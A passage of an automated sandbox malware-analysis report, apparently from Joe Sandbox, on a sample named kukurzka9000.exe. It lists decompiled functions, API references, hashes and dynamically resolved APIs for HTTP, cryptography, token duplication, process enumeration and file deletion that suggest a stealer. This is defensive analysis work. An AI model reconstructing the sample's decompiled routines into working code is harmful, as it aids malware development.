				_t29 = LocalAlloc(0x40, 0x100 +  *((intOrPtr*)( *0x40e08c))(__ecx) * 2);
				_t54 = _v16;
				_t52 = _t29;
				_t30 = 2;
				_t76 =  ==  ? _t30 : 0;
				_t77 = ( ==  ? _t30 : 0) + _t54;
				if(_t77 != 0) {
					do {
						_t39 = LocalAlloc(0x40, 0x100 +  *((intOrPtr*)( *0x40e08c))(_t54) * 2);
						_v8 = _t39;
						_t82 =  *((intOrPtr*)( *0x40e18c))(_t77,  *0x40e258);
						if(_t82 == 0) {
							if(_a4 == 0) {
								_push(_t77);
								if(E0040A3E4(_t77,  &_v8, 0,  *((intOrPtr*)( *0x40e08c))()) != 0) {
									_t47 = E0040A503(_t52, _v12);
									_t70 = _v8;
									goto L9;
								}
							} else {
								_t47 = E0040A503(_t52, _v12);
								_t70 = _a4;
								L9:
								_t52 = E0040A503(_t47, _t70);
							}
							_t83 = _v20;
							 *_t83 =  *((intOrPtr*)( *0x40e13c))( *_t83, _t52);
							_t77 = 0;
						} else {
							_t85 = _t82 - _t77 >> 1;
							if(E0040A3E4(_t77,  &_v8, 0, _t85) != 0) {
								_t52 = E0040A503(E0040A503(_t52, _v12), _v8);
							}
							_t77 = _t77 + _t85 * 2 + 2;
						}
						LocalFree(_v8);
						_t54 = _v16;
					} while (_t77 != 0);
				}
				_t80 = _v20;
				 *_t80 =  *((intOrPtr*)( *0x40e13c))( *_t80, _t52);
				LocalFree(_t52);
				return 1;
			}

0x0040a2b0
0x0040a2be
0x0040a2c7
0x0040a2ca
0x0040a2d9
0x0040a2db
0x0040a2e2
0x0040a2e4
0x0040a2e9
0x0040a2ec
0x0040a2ee
0x0040a2f4
0x0040a30c
0x0040a31b
0x0040a320
0x0040a324
0x0040a35f
0x0040a375
0x0040a389
0x0040a390
0x0040a395
0x00000000
0x0040a395
0x0040a361
0x0040a366
0x0040a36b
0x0040a398
0x0040a39f
0x0040a39f
0x0040a3a1
0x0040a3ae
0x0040a3b0
0x0040a326
0x0040a32b
0x0040a33b
0x0040a351
0x0040a351
0x0040a356
0x0040a356
0x0040a3b5
0x0040a3bb
0x0040a3be
0x0040a2f4
0x0040a3c6
0x0040a3d4
0x0040a3d6
0x0040a3e3

APIs

LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000000,?), ref: 0040A2D9
LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000000,?), ref: 0040A30C
LocalFree.KERNEL32(?,?,00000000,00000000,?), ref: 0040A3B5

Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040A3D6

Strings

X_, xrefs: 0040A2B0

Memory Dump Source

Source File: 0000000F.00000002.462450390.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.462637676.0000000000410000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$AllocFree$lstrlen$Global
String ID: X_
API String ID: 1425192967-1837567909
Opcode ID: f02083149c3b4205913990706b450f768aa50626d19ec5c5ad8e0b3c8012ab88
Instruction ID: 8d9fe808253cfd760579b52592682b105d53dbc0a4ab2c38afac3778b4664aea
Opcode Fuzzy Hash: f02083149c3b4205913990706b450f768aa50626d19ec5c5ad8e0b3c8012ab88
Instruction Fuzzy Hash: 5A419572A00314EFDB14DFA5DD81AAE77B5EB88310F10497AE941B7390DBB89D20CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00431266 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 004312E0
__aullrem.LIBCMT ref: 004314B0
__aulldiv.LIBCMT ref: 004314D2

Strings

9, xrefs: 004314E3

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 11e6684635529dbad8d35b36eef148a8965c2c1dbfdad4b443329b555f114060
Instruction ID: f0591ccac9ef110b670dbafa2154f0458bff898d973b6b25682ed3c2d09e6541
Opcode Fuzzy Hash: 11e6684635529dbad8d35b36eef148a8965c2c1dbfdad4b443329b555f114060
Instruction Fuzzy Hash: 1B4125B0E102299FDB24CF48C841BAEB7B5FF89314F1051AAD149AB251C7389E85CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 004312B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 004312E0
__aullrem.LIBCMT ref: 004314B0
__aulldiv.LIBCMT ref: 004314D2

Strings

9, xrefs: 004314E3

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 6e911fc6991dbc0dd141f8c46212a9eaaa5899a69abeb8a2316d7e632b1c436b
Instruction ID: 5b1078cb3ae15d9e769b38bd35f864cbac34573bdd3023a4d8c32d9638b75aed
Opcode Fuzzy Hash: 6e911fc6991dbc0dd141f8c46212a9eaaa5899a69abeb8a2316d7e632b1c436b
Instruction Fuzzy Hash: D44116B1E1012A9FEF24CF48C981BAEB7B5FF89314F1051AAD149AB251C7385E85CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0042FF3C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042FF68
__aullrem.LIBCMT ref: 00430135
__aulldiv.LIBCMT ref: 00430157

Strings

9, xrefs: 00430168

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 6b6ddc622a056617a5856230ff7480f80a991bdd0847e8647f113bc0b4bb191c
Instruction ID: 835cfe15b476ae8e4793af6b9a4f30a0ff4c6f9aecd7600ab4d96fd8f35f6e68
Opcode Fuzzy Hash: 6b6ddc622a056617a5856230ff7480f80a991bdd0847e8647f113bc0b4bb191c
Instruction Fuzzy Hash: C441E671D01229DFDB64CF48DCA9BAEB7B5FB48300F1086AAD008A7240C7395E84CF44

Uniqueness

Uniqueness Score: -1.00%

Function 0043125D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 004312E0
_get_int64_arg.LIBCMTD ref: 00431308
__aullrem.LIBCMT ref: 004314B0
__aulldiv.LIBCMT ref: 004314D2

Strings

9, xrefs: 004314E3

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: 1e2721535cc656cbde0337daf3e84c73702726f3bb7acc712b66a0e9bb19ac73
Instruction ID: 4f6c0f0e4c96b38d0cba1ee8cb67c5684d1908fa339e2039248adde2d440ae71
Opcode Fuzzy Hash: 1e2721535cc656cbde0337daf3e84c73702726f3bb7acc712b66a0e9bb19ac73
Instruction Fuzzy Hash: 864106B1E001299FDB24CF48C981BAEB7B5FF89314F1051EAE149AB251C7385E81CF1A

Uniqueness

Uniqueness Score: -1.00%

Function 0042FEEB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0042FF68
_get_int64_arg.LIBCMTD ref: 0042FF90
__aullrem.LIBCMT ref: 00430135
__aulldiv.LIBCMT ref: 00430157

Strings

9, xrefs: 00430168

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: 8050f4bc507ec0bb941bc43ca6d5d4e1f6f56b66609b99a9966d1b80a37584e8
Instruction ID: 6a8d78a9addc34f3ad7b00732ff531346a2d7fbc9811f2eeef7983ee3703c0e6
Opcode Fuzzy Hash: 8050f4bc507ec0bb941bc43ca6d5d4e1f6f56b66609b99a9966d1b80a37584e8
Instruction Fuzzy Hash: 7041E671E06228DFDB64CF58D8A9BAEB7B5FB48300F20969AD008A7240C7395E84CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0208A325 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,?,?,iqroq5112542785672901323), ref: 0208A33D
GetLastError.KERNEL32(?,iqroq5112542785672901323), ref: 0208A369
GlobalFree.KERNEL32(00000000), ref: 0208A3C6

Strings

iqroq5112542785672901323, xrefs: 0208A332

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: CurrentErrorFreeGlobalLastProcess
String ID: iqroq5112542785672901323
API String ID: 775681509-2937663778
Opcode ID: 4d261efb80a07d971c1b4c2ed8a49a1184e64f21143a526caa496802c9409c4c
Instruction ID: 1b54532fa476bd3589e2e87e515a7bc174f09bd62b0cdfe32c43ed3a1e0bab8c
Opcode Fuzzy Hash: 4d261efb80a07d971c1b4c2ed8a49a1184e64f21143a526caa496802c9409c4c
Instruction Fuzzy Hash: 38117235A00115FFDB119BE6DE44F9F7BB9EB48610F000465F901E2160DBB4EA14EB65

Uniqueness

Uniqueness Score: -1.00%

Function 0041AE98 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMTD ref: 0041AEAD

Part of subcall function 0041BCB0: __getptd_noexit.LIBCMTD ref: 0041BCB6
Part of subcall function 0041BCB0: __amsg_exit.LIBCMTD ref: 0041BCC6

__getptd.LIBCMTD ref: 0041AEBB
___DestructExceptionObject.LIBCMTD ref: 0041AF28

Strings

csm, xrefs: 0041AECC

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __getptd$DestructExceptionObject__amsg_exit__getptd_noexit
String ID: csm
API String ID: 4182212180-1018135373
Opcode ID: 0c34df0d760dd2be17682900818bc7e984008826c765d5e1224b71bd8f6bbe05
Instruction ID: 3e0ef99184adc83b36a3de020c612cd6e5a1dcf5289a61a20a03a7259e04c887
Opcode Fuzzy Hash: 0c34df0d760dd2be17682900818bc7e984008826c765d5e1224b71bd8f6bbe05
Instruction Fuzzy Hash: 161158B49122089BCF04DF51D1409EB7B72BF44359F90806AE8084B301D739EED2CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 020839C7 Relevance: 6.2, APIs: 4, Instructions: 200fileCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(?,?,?,?,00000000), ref: 02083C32

Part of subcall function 0208A905: LocalFree.KERNEL32(00000000,?,?,02082C15), ref: 0208A968

DeleteFileW.KERNEL32(?), ref: 02083C11
DeleteFileW.KERNEL32(?,?,?,?,00000000), ref: 02083C21
LocalFree.KERNEL32(?,?,?,?,00000000), ref: 02083C28

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocal$DeleteFile
String ID:
API String ID: 2194112602-0
Opcode ID: aa236570a63e942e95a62eeae442c9e13dcf8293740132a561ba828fd4245b9e
Instruction ID: a9270e0650ad7c02b2d905b8c715ab16e37146a736a67fa95500b556d82182e5
Opcode Fuzzy Hash: aa236570a63e942e95a62eeae442c9e13dcf8293740132a561ba828fd4245b9e
Instruction Fuzzy Hash: AC71C231504210EFDB41AFA6EE84A9E3BB5FB48710B104D75F625E72A0DB30D920DF59

Uniqueness

Uniqueness Score: -1.00%

Function 02081BD5 Relevance: 6.1, APIs: 4, Instructions: 130COMMON

Download Yara Rule

APIs

PathCombineW.SHLWAPI(00000000,?,?), ref: 02081C77
LocalFree.KERNEL32(00000000), ref: 02081C97
FindClose.KERNEL32(00000000), ref: 02081CB5
PathCombineW.SHLWAPI(00000000,?,?), ref: 02081D0B

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: CombinePath$CloseFindFreeLocal
String ID:
API String ID: 2199340046-0
Opcode ID: 71846108eca0c7d647193b22d8ce5dd4fdf7bc5ca958116010044f5b0674090b
Instruction ID: 0dcca5de976590b6a4810eba3f10bd059d437de947e313e9531d4056b5cc4640
Opcode Fuzzy Hash: 71846108eca0c7d647193b22d8ce5dd4fdf7bc5ca958116010044f5b0674090b
Instruction Fuzzy Hash: D6413971500328AFCB15EB55CE84FEBB378EF45300F004568FA19A3290EB749A56DF64

Uniqueness

Uniqueness Score: -1.00%

Function 02081D6C Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

APIs

PathCombineW.SHLWAPI(00000000,?,?), ref: 02081E10
LocalFree.KERNEL32(00000000), ref: 02081E74
FindClose.KERNEL32(00000000), ref: 02081EE1

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: CloseCombineFindFreeLocalPath
String ID:
API String ID: 2857355001-0
Opcode ID: bc6433c40a8b9f75e8f33f0345bf4f0871bf308c0c9983f9c55045f8c74c41ce
Instruction ID: e16cbccb38c20898be79e79508c8238e0af75326267d1a6d38b8a155b5f48c1e
Opcode Fuzzy Hash: bc6433c40a8b9f75e8f33f0345bf4f0871bf308c0c9983f9c55045f8c74c41ce
Instruction Fuzzy Hash: A4413872500314AFDB11EB51DE84FEBB7B8EF45300F000464FA09A3190EBB49A56DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0042B634 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

__errno.LIBCMTD ref: 0042B65A
__errno.LIBCMTD ref: 0042B650

Part of subcall function 00419D50: __getptd_noexit.LIBCMTD ref: 00419D56

_memset.LIBCMT ref: 0042B6C3
__errno.LIBCMTD ref: 0042B718

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: __errno$__getptd_noexit_memset
String ID:
API String ID: 2566647553-0
Opcode ID: 1b48cd490129e75590af3b027f3b6103edbc69c545417cd468af48ab97c2e8e5
Instruction ID: d37dbc28f95ddef8e69025ae021ec1e05b2bb3543eccda486b0baf71b08d6c61
Opcode Fuzzy Hash: 1b48cd490129e75590af3b027f3b6103edbc69c545417cd468af48ab97c2e8e5
Instruction Fuzzy Hash: D6318430A00219EADF20DF54E9457AE7770EF51339F64826BE4292A3E1D3794D81CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 02084204 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 02084235
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 02084242
LocalFree.KERNEL32(00000000), ref: 02084273
LocalFree.KERNEL32(00000000), ref: 0208427E

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: FolderFreeLocalPathSpecial
String ID:
API String ID: 1111715986-0
Opcode ID: 88e42fc18ceae2b43f943ef1e8e127dc7ffeae556461e89db75f0c87543971c0
Instruction ID: d8c344313a10f843a75d5e79c8352bd6457abc813c58e1421282257a4cadf744
Opcode Fuzzy Hash: 88e42fc18ceae2b43f943ef1e8e127dc7ffeae556461e89db75f0c87543971c0
Instruction Fuzzy Hash: 0C0128713403047BF7246B96AD4AFAB3769DBC5B21F040134FB1CAB2C0DAB09C1186AE

Uniqueness

Uniqueness Score: -1.00%

Function 020892CB Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

GetUserDefaultLCID.KERNEL32(00001001,00000000,00000104,?,02089CB7,00000000), ref: 02089303
wsprintfW.USER32 ref: 02089314

Part of subcall function 0208A76A: GlobalFree.KERNEL32(02082C15), ref: 0208A7B7

LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02087D85), ref: 0208932C
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02087D85), ref: 02089333

Memory Dump Source

Source File: 0000000F.00000002.474014506.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2080000_F0geI.jbxd

Yara matches

Similarity

API ID: Free$Local$DefaultGlobalUserwsprintf
String ID:
API String ID: 3020363445-0
Opcode ID: 6b0006650763f32028c04d1d8b65d76126bb1431ea6ad44ba0a84cd2c8da19fe
Instruction ID: 00b5dde12a7042c4188b6040bd0da90341a10861206b760a6305ecaa7a41399e
Opcode Fuzzy Hash: 6b0006650763f32028c04d1d8b65d76126bb1431ea6ad44ba0a84cd2c8da19fe
Instruction Fuzzy Hash: D8F0C8B1200214AFF3005BA6AD89E6777ACEB48720F004435F749B7290CAB46C20866D

Uniqueness

Uniqueness Score: -1.00%

Function 00420412 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

__whiteout.LIBCMTD ref: 0042059F
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004215A6

Strings

n, xrefs: 004205CA

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: Locale$UpdateUpdate::~___whiteout
String ID: n
API String ID: 2661511698-2013832146
Opcode ID: a33af23d6a0fab86e66f612ac922636c844993ceb07215517b78c2e6999f35a1
Instruction ID: 0ed35de28cb5c4300c01912a322ac160f30ea6637afc2d79283bb38ba67d480f
Opcode Fuzzy Hash: a33af23d6a0fab86e66f612ac922636c844993ceb07215517b78c2e6999f35a1
Instruction Fuzzy Hash: 0641BF70A01269DBCF24CF55E4947EEBBF0AF41315F5481DBE8566A292C2388EC1CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004203E7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

__whiteout.LIBCMTD ref: 0042059F
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004215A6

Strings

n, xrefs: 004205CA

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: Locale$UpdateUpdate::~___whiteout
String ID: n
API String ID: 2661511698-2013832146
Opcode ID: 5f2175965e7bc0c0ed41a6cc2b9d15174e87f48c80463089164edb535b038560
Instruction ID: 0ed35de28cb5c4300c01912a322ac160f30ea6637afc2d79283bb38ba67d480f
Opcode Fuzzy Hash: 5f2175965e7bc0c0ed41a6cc2b9d15174e87f48c80463089164edb535b038560
Instruction Fuzzy Hash: 0641BF70A01269DBCF24CF55E4947EEBBF0AF41315F5481DBE8566A292C2388EC1CF59

Uniqueness

Uniqueness Score: -1.00%

Function 004204D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

__whiteout.LIBCMTD ref: 0042059F
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004215A6

Strings

n, xrefs: 004205CA

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: Locale$UpdateUpdate::~___whiteout
String ID: n
API String ID: 2661511698-2013832146
Opcode ID: bfd66062e8e27a280552f7e2b3ad207d37083d325a47f0f773fbd0b790f8c2e7
Instruction ID: d47c12be78318011e057a18be39ad1a7240684078ae5c7abe8e65317bfe61cd6
Opcode Fuzzy Hash: bfd66062e8e27a280552f7e2b3ad207d37083d325a47f0f773fbd0b790f8c2e7
Instruction Fuzzy Hash: AE319170A01268EBCF24CF55E4947EEBBF0AF11315F5041DBE85666252C2388EC1CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00420B4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_isxdigit.LIBCMTD ref: 00420BBD
__hextodec.LIBCMTD ref: 00420BF0
_isdigit.LIBCMTD ref: 00420C16
__inc.LIBCMTD ref: 00420D00
__un_inc.LIBCMTD ref: 00420D24
_isxdigit.LIBCMTD ref: 00420D7D
__hextodec.LIBCMTD ref: 00420DA0
_isdigit.LIBCMTD ref: 00420DC3
__inc.LIBCMTD ref: 00420E74
__un_inc.LIBCMTD ref: 00420E98
_LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004215A6

Strings

p, xrefs: 00420BAF

Memory Dump Source

Source File: 0000000F.00000002.462652661.0000000000412000.00000020.00000001.01000000.00000004.sdmp, Offset: 00412000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_412000_F0geI.jbxd

Similarity

API ID: Locale__hextodec__inc__un_inc_isdigit_isxdigit$UpdateUpdate::~_
String ID: p
API String ID: 1652772854-2181537457
Opcode ID: 7e471efdfc92bb58afa428daf1570721bc5bde3b08cbc77e8dd7330fa0d0a624
Instruction ID: ab9035c48991bbb2de8ccdc8194c1671506a212b0df9223f12cb3ba8c7c441a8
Opcode Fuzzy Hash: 7e471efdfc92bb58afa428daf1570721bc5bde3b08cbc77e8dd7330fa0d0a624
Instruction Fuzzy Hash: 272145B4E052798ACB29CF65E8543EEBBF1AB45304F5441DBC41966203D2385A81DF49

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: kukurzka9000.exePID: 4560, Parent PID: 5608COMMON

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	70.4%
Signature Coverage:	0%
Total number of Nodes:	1551
Total number of Limit Nodes:	2

Executed Functions

Function 0040100B Relevance: 217.5, APIs: 15, Strings: 109, Instructions: 531
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(kernel32.dll,?,?,00407780), ref: 00401016
GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 00401036
LoadLibraryW.KERNELBASE(WinInet.dll,?,?,?,?,?,00407780), ref: 00401061
LoadLibraryW.KERNELBASE(Crypt32.dll,?,?,?,?,?,00407780), ref: 00401091
LoadLibraryW.KERNELBASE(Bcrypt.dll,?,?,?,?,?,00407780), ref: 004010AA
GetProcAddress.KERNEL32(?,GetProcAddress), ref: 004010B8
GetProcAddress.KERNEL32(?,HeapFree), ref: 00401297
GetProcAddress.KERNEL32(?,Sleep), ref: 00401369
GetProcAddress.KERNEL32(00000000,StrToIntA), ref: 004014CB
GetProcAddress.KERNEL32(00000000,StrToInt64ExW), ref: 004014E9
GetProcAddress.KERNEL32(?,CharUpperW), ref: 004015C1
GetProcAddress.KERNEL32(?,InternetOpenUrlA), ref: 004016F6
GetProcAddress.KERNEL32(?,InternetReadFileExW), ref: 00401714
GetProcAddress.KERNEL32(?,HttpQueryInfoA), ref: 00401768
GetProcAddress.KERNEL32(?,HttpQueryInfoW), ref: 00401774

Strings

ConvertSidToStringSidW, xrefs: 004014F7
StrStrW, xrefs: 0040149C
CryptStringToBinaryA, xrefs: 0040166A
Process32First, xrefs: 00401316
GetUserDefaultLCID, xrefs: 0040116C
CoCreateInstance, xrefs: 00401655
Sleep, xrefs: 0040135E
CharUpperW, xrefs: 004015B6
GetTimeZoneInformation, xrefs: 00401190
lstrcmpA, xrefs: 004013A0
GetSystemInfo, xrefs: 00401152
SetCurrentDirectoryW, xrefs: 0040133A
FindFirstFileW, xrefs: 00401256
DuplicateTokenEx, xrefs: 00401511
FindClose, xrefs: 00401244
InternetReadFileExW, xrefs: 00401709
RegCloseKey, xrefs: 00401559
kernel32.dll, xrefs: 00401011
Crypt32.dll, xrefs: 00401089
MultiByteToWideChar, xrefs: 004012F2
GetEnvironmentVariableW, xrefs: 004010CA
GlobalMemoryStatusEx, xrefs: 004011C6
InternetSetOptionW, xrefs: 004016D9
HeapFree, xrefs: 0040128C
HttpQueryInfoW, xrefs: 0040176E
GetSystemMetrics, xrefs: 0040160A
StrToInt64ExW, xrefs: 004014DE
GetUserDefaultLocaleName, xrefs: 0040117E
CryptBinaryToStringW, xrefs: 0040168E
InternetOpenUrlW, xrefs: 00401701
InternetConnectW, xrefs: 004016B5
InternetOpenUrlA, xrefs: 004016EB
GetDriveTypeW, xrefs: 004010EE
FindNextFileW, xrefs: 00401272
CreateFileW, xrefs: 004011EA
CreateToolhelp32Snapshot, xrefs: 0040127A
StrStrIW, xrefs: 004014B8
InternetCloseHandle, xrefs: 00401727
Advapi32.dll, xrefs: 00401069
Shlwapi.dll, xrefs: 00401038
StrCpyW, xrefs: 00401478
SystemFunction036, xrefs: 004015A1
CreateMutexW, xrefs: 004011FC
WinInet.dll, xrefs: 00401059
lstrcmpW, xrefs: 004013B2
lstrlenA, xrefs: 004013C4
RegEnumKeyExW, xrefs: 0040156B
LocalAlloc, xrefs: 004012E0
WideCharToMultiByte, xrefs: 004013FA
GetTokenInformation, xrefs: 00401523
lstrcpynA, xrefs: 0040137C
StrToIntW, xrefs: 004014D6
Ole32.dll, xrefs: 0040104C
OpenProcessToken, xrefs: 00401547
CreateProcessWithTokenW, xrefs: 004014FF
PathCombineW, xrefs: 00401454
lstrlenW, xrefs: 004013D6
InternetOpenW, xrefs: 004016C7
SHGetSpecialFolderPathW, xrefs: 00401430
CoInitialize, xrefs: 00401643
SetEnvironmentVariableW, xrefs: 0040134C
WriteFile, xrefs: 004013E8
Shell32.dll, xrefs: 00401099
DeleteFileW, xrefs: 00401220
ReadFile, xrefs: 00401304
ShellExecuteW, xrefs: 0040140C
HttpQueryInfoA, xrefs: 0040175D
GetLastError, xrefs: 00401100
GetDC, xrefs: 004015E6
RegQueryValueExW, xrefs: 0040158F
Process32Next, xrefs: 00401328
CryptStringToBinaryW, xrefs: 0040167C
GetLogicalDriveStringsW, xrefs: 00401124
OpenMutexW, xrefs: 004012AA
GlobalFree, xrefs: 004011B4
GetDesktopWindow, xrefs: 004015F8
ReleaseDC, xrefs: 0040161C
GetCurrentProcess, xrefs: 004010BD
HttpSendRequestW, xrefs: 0040174B
GetSystemWow64DirectoryW, xrefs: 0040115A
PathMatchSpecW, xrefs: 00401442
StrStrA, xrefs: 0040148A
GetUserNameW, xrefs: 00401535
GlobalAlloc, xrefs: 004011A2
SHGetFolderPathW, xrefs: 0040141E
RegOpenKeyExW, xrefs: 0040157D
LocalFree, xrefs: 004012CE
wsprintfW, xrefs: 0040162E
GetModuleFileNameW, xrefs: 00401136
User32.dll, xrefs: 00401079
StrRChrW, xrefs: 00401466
GetProcAddress, xrefs: 004010B0
lstrcpyA, xrefs: 00401374
EnumDisplayDevicesW, xrefs: 004015CC
OpenProcess, xrefs: 004012BC
GetLocaleInfoW, xrefs: 00401112
